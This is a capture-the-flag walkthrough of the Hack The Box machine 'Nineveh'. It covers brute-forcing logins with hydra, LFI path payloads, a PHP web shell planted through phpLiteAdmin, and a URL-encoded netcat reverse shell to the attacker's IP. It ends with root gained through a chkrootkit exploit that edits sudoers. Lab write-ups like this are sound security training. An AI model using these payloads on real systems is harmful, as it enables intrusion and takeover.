Nineveh — HTB Walkthrough

ENUMERATION

Nmap Scan

Adding nineveh.htb to hosts

80 HTTP ENUMERATION

Visiting website shows

Gobuster Scan and nikto scan

Department

Visiting website and source code

When we try to login as amrois — amrois it says wrong username.When we try to enter admin -admin it says wrong password.Tried SQL injection, but didn’t work. Running a gobuster scan again on department

After enumerating a lot I found there is no option left apart from bruteforcing password. Capture request on burp

Now use hydra and wordlists rockyout.txt

We got the password

admin : 1q2w3e4r5t

Checking notes we see

LFI used further after 443

php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd : works

php://filter/convert.base64-encode/resource=../../../../../../../../home/amrois/.ssh/id_rsa : Gives us file name too long

443 ENUMERATION

Nikto Scan

Gobuster Scan revealed

Visiting /db

After enumerating a lot on phpLiteAdmin, I couldn’t find a good exploit. So we did bruteforce on db/index.php

Capture on burp

Using hydra , we get password : password123 , < run hydra with rockyou.txt for password and username: admin, it doesn’t make a difference, since there is no user defined>

Login in

We see we have access to db. And we have an exploit to RCE

Going as per exploit

creating DB hack.php, Table : shell. Field name : malicious field and Default value = malicious code

This did not work on executing LFI, which will be shown with real exploit after a minute. So now instead of making a field with default value containing malicious code. We will create field name containing malicious code

Hack.php doesn’t work, because LFI needs name ninevehNotes

DB : ninevehNotes.php ; table : shell ; Field Name : <?php echo system($_REQUEST[“cmd”]); ?> ; default value : text (null)

And it worked

EXPLOITATION

For getting shell we will be sending URL encoded reverse shell. I first used URL encoded nc -nv 10.10.14.16 1234 -e /bin/sh. But that didn’t work so. We will use pipe.

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%31%36%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66

upper bar shows Request LFI format, lower terminal shows Netcat output

GETTING USER

Transfer both images on attacker machine

Doing strings command on both we see. Nineveh.png gave ssh keys

Doing strings on both we see. Nineveh.png gave ssh keys (private Key)

public key

So we check knockd.conf to see SSH rules

Simply running SSH on this doesn’t work. So we need to do a nmap scan on each of ports metioned above in same order

And now doing ssh in amrois . We can get USER.txt

PRIVILEGE ESCALATION

cronjob running

We see every mnute a report is generated in report folder accessed by report-reset.sh . Now since this is done by chkrootkit, which is vulnerable to exploit. When there is no valid file name it takes input from /tmp/update.

https://www.exploit-db.com/exploits/33899

So we will manipulate update file in tmp directory (we will make a file /tmp/update) . And ask it to give permission to /etc/sudoers and write amrois in sudoers, which require no auth for running sudo command and again restore permissions of /etc/sudoers

ROOTED !!!